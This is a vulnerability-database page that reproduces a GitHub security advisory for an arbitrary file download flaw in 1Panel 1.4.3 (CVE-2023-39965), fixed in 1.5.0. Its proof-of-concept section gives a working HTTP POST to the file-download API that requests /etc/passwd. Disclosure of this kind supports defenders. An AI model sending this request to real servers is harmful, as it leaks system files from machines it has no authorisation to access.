Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-85cf-gj29-f555

GitHub Security Advisory

1Panel Arbitrary File Download vulnerability

✓ GitHub Reviewed MODERATE Has CVE
View on GitHub

Advisory Details

### Summary
Any file downloading vulnerability exists in 1Panel backend.

### Details
Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.
![image](https://user-images.githubusercontent.com/116613486/257246024-d0e35800-5fd8-4907-8b1b-504afaad859e.png)

### PoC
payload:

POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json

{"path":"/etc/passwd"}

![f77959349e96543436eea18283fa75c](https://user-images.githubusercontent.com/116613486/257245459-13f2f31b-fcfe-4a27-ba52-e2f1e5d4d749.png)

### Impact
Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.

Affected Packages

Go github.com/1Panel-dev/1Panel
Affected versions: 1.4.3 (fixed in 1.5.0)

Related CVEs

CVE-2023-39965

Key Information

GHSA ID
GHSA-85cf-gj29-f555
Published
August 10, 2023 8:09 PM
Last Modified
August 10, 2023 8:09 PM
CVSS Score
5.0 /10
Primary Ecosystem
Go
Primary Package
github.com/1Panel-dev/1Panel
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 12, 2025 6:29 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.